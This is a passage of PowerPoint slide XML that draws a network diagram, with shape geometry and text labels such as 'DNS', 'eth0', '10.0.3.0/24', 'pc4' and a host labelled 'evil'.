                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5982" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7311" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7975" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7975" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7145" y="9865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8142" y="9865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8142" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="9865"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="8972" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12462" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="13625" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20271" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20271" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="18609" y="6463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20437" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20437" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="6463"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F5F1F1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9286" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60F01BB9-BEE4-1A21-4C6E-39872E85EE0B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10714425" y="4391396"/>
              <a:ext cx="278148" cy="107828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="3600" kern="10">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9287" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5757FA4B-8B35-163C-3CAE-EA6AF1AFFE5E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10432210" y="4653248"/>
              <a:ext cx="907197" cy="248402"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0" err="1"/>
                <a:t>dnsuni</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9288" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3867FF8D-A655-1F71-C524-71AFBC68A321}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3087815" y="3547893"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9289" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8BEB334-E9B6-E2EF-B99A-87142E24E75A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9290" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9985F884-5AA2-7EBE-7E7F-4A739A1C3315}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9291" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3E83C0F-12A1-036D-B2EE-A5A1702B592B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3109411" y="4016212"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9292" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6391DD38-26B7-3CD7-3716-09CFBCF9B56E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9293" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7977DCF-1E5B-F11C-FB86-D1145F720409}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9295" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FC78CFA-FB4F-6177-0E61-0B4870171041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076643" y="3780075"/>
            <a:ext cx="220690" cy="220690"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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it-IT" altLang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9296" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3628DF88-B52E-1BC8-E9C6-880486D9C021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3712201" y="3761897"/>
            <a:ext cx="1066318" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5F5F5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it-IT" altLang="it-IT" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10.0.3.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9300" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0828F821-CD0C-DE19-7DC0-AAC7BA328D60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1245708" y="2923524"/>
            <a:ext cx="220690" cy="220690"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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it-IT" altLang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9302" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43685EBF-BF6E-8E65-9813-CEF603A5A986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4936638" y="5924428"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9303" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A467F662-F144-1FAF-530C-CBCF27345A11}"/>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52" y="1064"/>
              <a:ext cx="573"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304" name="Text Box 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{304D80ED-CF91-8F1F-1608-557E18B7A5DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1429" y="1582"/>
              <a:ext cx="818" cy="352"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
                <a:t>pc4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9309" name="Gruppo 9308">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E4168A7-9620-4975-D8C3-247C1FC1FAD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1862910" y="1768735"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9310" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB133FA7-7096-4C0E-1FCE-893B5043F991}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10432210" y="4653248"/>
              <a:ext cx="907197" cy="248402"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
                <a:t>evil</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9311" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AFB4237-5E60-DACE-EEA9-0BB455A6A309}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4306849"/>
              <a:ext cx="378624" cy="350441"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 15116"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9312" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35E3B52C-351B-4813-8092-F162E32843E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4360763"/>
              <a:ext cx="324710" cy="296527"/>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 name="T24" fmla="*/ 326 w 21600"/>
                <a:gd name="T25" fmla="*/ 22180 h 21600"/>
                <a:gd name="T26" fmla="*/ 21559 w 21600"/>
                <a:gd name="T27" fmla="*/ 27893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extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="10885"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10634" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10800" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="10885"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1163" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16449" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="2381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
